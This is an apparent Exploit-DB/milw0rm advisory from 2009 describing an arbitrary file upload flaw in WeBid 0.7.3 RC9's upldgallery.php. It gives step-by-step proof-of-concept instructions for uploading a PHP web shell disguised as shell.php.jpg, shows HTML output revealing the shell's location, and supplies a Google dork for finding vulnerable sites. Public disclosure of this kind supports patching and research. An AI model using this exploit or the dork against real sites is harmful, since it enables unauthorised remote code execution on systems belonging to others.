WeBid 0.7.3 RC9 - 'upldgallery.php' Arbitrary File Upload
Author: Ahmad Pay
type: webapps
platform: php
port:
date_added: 2009-03-24
date_updated: 2016-12-21
verified: 1
codes:
tags:
aliases:
screenshot_url:
application_url: http://www.exploit-db.comWeBid-0.7.3.zip
-----------------------------------------------------------------------------------------
Author : Ahmad Pay
Date : March, 25 2009
Location : Bojonegoro, Indonesia
Critical : High
Impact : System Access
Where : From Remote
---------------------------------------------------------------------------
Application : WeBid
version : <= 0.7.3 RC9
Vendor : http://sourceforge.net/projects/simpleauction
--------------------------------------------------------------------------
Vulnerability:
~~~~~~~~~~
Anyone can upload shell php with extension eg: shell.php.jpg.
Poc/Exploit:
~~~~~
http://www.example.com/[path]/upldgallery.php
Then after upload shell right click to the pages to find your shell path
#######################################
eg:
</script>
</head>
<body bgcolor="#FFFFFF">
<div class="container">
<img src="uploaded/211fa0e52f7c85cb5cc652f4864e4de9/shell.php.jpg" style="float: left; margin-right: 10px;" id="thumbnail" alt="Create Thumbnail" />
<div style="float:left; position:relative; overflow:hidden; border:#000000 double; width:0; height:0;">
<img src="uploaded/211fa0e52f7c85cb5cc652f4864e4de9/shell.php.jpg" style="position: relative;" alt="Thumbnail Preview" />
</div>
#######################################
Shell address above is : http://www.example.com/[path]/uploaded/211fa0e52f7c85cb5cc652f4864e4de9/shell.php.jpg
--------------------------------------------------------------------------
Dork:
~
Google : Powered by WeBid © 2008, 2009 Webid
# milw0rm.com [2009-03-25]